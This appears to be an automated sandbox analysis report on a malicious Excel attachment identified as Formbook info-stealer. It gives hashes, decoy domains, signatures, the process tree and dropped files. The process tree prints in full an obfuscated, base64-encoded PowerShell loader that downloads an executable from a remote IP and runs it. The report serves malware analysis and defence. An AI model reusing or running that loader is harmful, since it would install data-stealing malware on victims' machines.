Analysis

  • max time kernel
    146s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    29-08-2024 01:44

General

  • Target

    29082024_0144_28082024_Nuevo orden agosto.xls

  • Size

    555KB

  • MD5

    0eca5068b23513d7d20d9f05b5a33cde

  • SHA1

    b11da160460403bacb257d4832ca617fcf8c9840

  • SHA256

    b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

  • SHA512

    2b16f2c208573a9361b646e34b6ac627fb3d9b80fb0ff7a09cf3d0e5bfeefb2d09ad482e428a5effe80a3da1267df4c07f08728f589ea6b01324ef6adb102d16

  • SSDEEP

    12288:++M2PYL9XdP7MqOZzCSbxuKuw+9WompCHYCFxi7Ehh7wYf:+cPYLpdwZdMK3ewCHTqo0Y

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

b48n

Decoy

anifestmindset.net

ommybahamabigsales.shop

3tcxr.xyz

iano-world.net

rconf23.net

atherpa.shop

trllrpartners.club

5sawit777.pro

ctbhuxcdreioijresol.top

opinatlas.app

pinstar.xyz

mfengwa.top

8games13.xyz

tickpaket.online

iphuodongallbbtbtm.top

ental-bridges-51593.bond

laywithkemon.rest

lkpiou.xyz

a88.land

igfloppafan.club

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\29082024_0144_28082024_Nuevo orden agosto.xls"
      2⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:3040
    • C:\Windows\SysWOW64\msdt.exe
      "C:\Windows\SysWOW64\msdt.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2796
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CF2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3CF1.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1204
        • C:\Users\Admin\AppData\Roaming\MeMpEng.exe
          "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1536
          • C:\Users\Admin\AppData\Roaming\MeMpEng.exe
            "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2572

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    344B

    MD5

    2a22d79f810194591562f5550fd2fdaf

    SHA1

    9085f1492a5bcc3f539169ebd82cbe8ead4f4eec

    SHA256

    d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1

    SHA512

    281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    d38582100e02b55c52f0abf17f341af4

    SHA1

    84b215051a94357b63b4cfb5eaff4cdb33882440

    SHA256

    a8f00a3577f30d397672d1a4ee31571f638dc9cd4b4e46c4510714dd765b2c03

    SHA512

    0a0d97c3873388c13efcb5ef2b370cabf07ffb2466c9e2d50fb2c4189cb3786621232963cc70126a04483e91e8c907cc6f2e74e37de11252161064338c0a1c16

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    544B

    MD5

    f9566984e5f964d900d054591e995128

    SHA1

    d319131809626aa276df82dcca849ad0ff0c048f

    SHA256

    7e4c57c0eb315d2069e8adbb705c282efff0355d659194f55f9264bb356c593d

    SHA512

    61cd10b3da03b7f737db7e3e95cc69a13429e879d3a3508d14b5aa0643fbf9b48265865c48b18761009edf73cc3a5fbd6a6ba7570de03dec541bf769ac9b9746

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    926df9f09fc03fc48bc375b94a59ac53

    SHA1

    8cbf5ed6a69d5bfa85e751f0bc6d652e68147fec

    SHA256

    1f62c69cf106a48f05344730b0c807e08b84794393a16920710de35dccd5fe1e

    SHA512

    971ac7dc7b532b10344f7f919140a81b42dd8a860c215288f2fb659ffe776683284b67ac587193fca841af904429f4ad631a516b3f06a2514c38ba387fa8da85

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\IEnetworthUpdated[1].hta

    Filesize

    12KB

    MD5

    87635cf66104074c53e698677de6002b

    SHA1

    958ba282403c968f0dc8631aa396b8a73612ffe3

    SHA256

    4768f32e03962166a83fab45ea2e5865291e66bff359c547573ca34da6fe78cf

    SHA512

    7976b9820a1494953d6b99982e696a9faed599bc8ec932e92285ab10eb5db8d6ff76794309d062c8e8410e1142d06f75a70c417ea646e0adb5b42a2c55a3e31d

  • C:\Users\Admin\AppData\Local\Temp\Cab37C3.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES3CF2.tmp

    Filesize

    1KB

    MD5

    d999f5d2dfe120849537621c9b7f2e81

    SHA1

    3e64d1fcd139df85d0e71ef83dee9028b88ea63b

    SHA256

    4da1badd97443afba14ebd96c8d76b4d2e7acddf45cc0d2c8d77b8efae3bee67

    SHA512

    e82a11e09794773f316c1944e248410d830547c1d8cc13ec4b616ef86b9d40efdcdd581d8d53649c054ff1cd8676dae83395d08b50425b2b316c2dc6b4763e1b

  • C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.dll

    Filesize

    3KB

    MD5

    7bca2684abcbdd567785c28658cc7395

    SHA1

    2d5d6d3e4ee1033afd0b3f4cb869f8b212a92cba

    SHA256

    1dba6147e1ea9f4e64e699f5775348fc020e5a22f14780ee527ca9c7a04fea2d

    SHA512

    ba4e3a102e5801654e5333859e27bd308c8fc242da4e420528845939bb2cd47db7c00a78a996961a775ba7d81058510b1e3123cd7c7ac2f8fa094a1388171f89

  • C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.pdb

    Filesize

    7KB

    MD5

    c44a3ca81090c6eb4168f2baa4c647a4

    SHA1

    23ad6ef2f427404d64bbe16b0ee95ec8eb6599fb

    SHA256

    c5da80199072c6617a65bbae884d04fcaea47b43b5055321eb7f022eecea49a0

    SHA512

    99fb6479f4eb7b83edc78002353b45b7af2ee57b9dd665386f11da6aa84bac0de0083d8405178e7be9709b38973253534b23b85cc47d9cee892a693626f61fdf

  • C:\Users\Admin\AppData\Roaming\MeMpEng.exe

    Filesize

    604KB

    MD5

    dd2e0becfb1316c49975386fc3367c45

    SHA1

    98c578ff997ef781919ca5967251fa9d462a756e

    SHA256

    14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628

    SHA512

    4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC3CF1.tmp

    Filesize

    652B

    MD5

    cf5a364d75ec01854a552bb49dd20640

    SHA1

    24b28726b5255edafcfb8974c42b1f0e4fde4706

    SHA256

    940be207b263540c536e5ca6cca04f9975a6593630d3e22f98c80bc46952a23f

    SHA512

    2fdde78b5485bb3aa2fb44c7d8787696682d6a8d9096eb09f9ec89cb5216e4e5bf2cb094447ebdc3ae1f923f32a629965e8e9e85d0a119ae9839a8ba9321ab68

  • \??\c:\Users\Admin\AppData\Local\Temp\tzdsmlu7.0.cs

    Filesize

    469B

    MD5

    f2a64cd1f09c060d9412d84239f92021

    SHA1

    8053849b3e79d63181b74207b19e76775a248982

    SHA256

    2f6ec9f074eca2e37185fbec988ed8bd98be664feeec718f77cc489413ddd1d7

    SHA512

    f7661e45c4752e6457741d1bd753e25e1b624fd0c85062b74c0a8d0334c4b7a7fb4ef58295b31607ad427b08d8b87b730025b33fbd3b60041af83e29dbb95513

  • \??\c:\Users\Admin\AppData\Local\Temp\tzdsmlu7.cmdline

    Filesize

    309B

    MD5

    eac48470226ecca10dd0ca11d529d8f7

    SHA1

    f0b5b6b50c4c7a152e65ec87dddd105536f6ca56

    SHA256

    0feda6d4d2b05ecdde385be444c2544de93e53d5836e3b337306ab61ea597f36

    SHA512

    b663dd3ee88541e1d474ee82ea386bfa2dbf9090ae4158cc011003162444af588d60142cc0edad414950ed4f51a16be49cf2512386e61387946f2947361ef2fd

  • memory/1220-78-0x0000000000030000-0x0000000000124000-memory.dmp

    Filesize

    976KB

  • memory/1220-79-0x0000000000180000-0x00000000001AF000-memory.dmp

    Filesize

    188KB

  • memory/1392-77-0x0000000005010000-0x00000000050F0000-memory.dmp

    Filesize

    896KB

  • memory/1392-82-0x00000000075C0000-0x00000000076A0000-memory.dmp

    Filesize

    896KB

  • memory/1536-64-0x0000000001230000-0x00000000012CC000-memory.dmp

    Filesize

    624KB

  • memory/1536-65-0x0000000000600000-0x0000000000618000-memory.dmp

    Filesize

    96KB

  • memory/1536-67-0x0000000000E10000-0x0000000000E86000-memory.dmp

    Filesize

    472KB

  • memory/2572-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2572-73-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2572-70-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2572-68-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2572-76-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/2908-18-0x0000000002C20000-0x0000000002C22000-memory.dmp

    Filesize

    8KB

  • memory/3040-1-0x000000007208D000-0x0000000072098000-memory.dmp

    Filesize

    44KB

  • memory/3040-66-0x000000007208D000-0x0000000072098000-memory.dmp

    Filesize

    44KB

  • memory/3040-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/3040-19-0x0000000002EB0000-0x0000000002EB2000-memory.dmp

    Filesize

    8KB

  • memory/3040-93-0x000000007208D000-0x0000000072098000-memory.dmp

    Filesize

    44KB

  • memory/3040-90-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB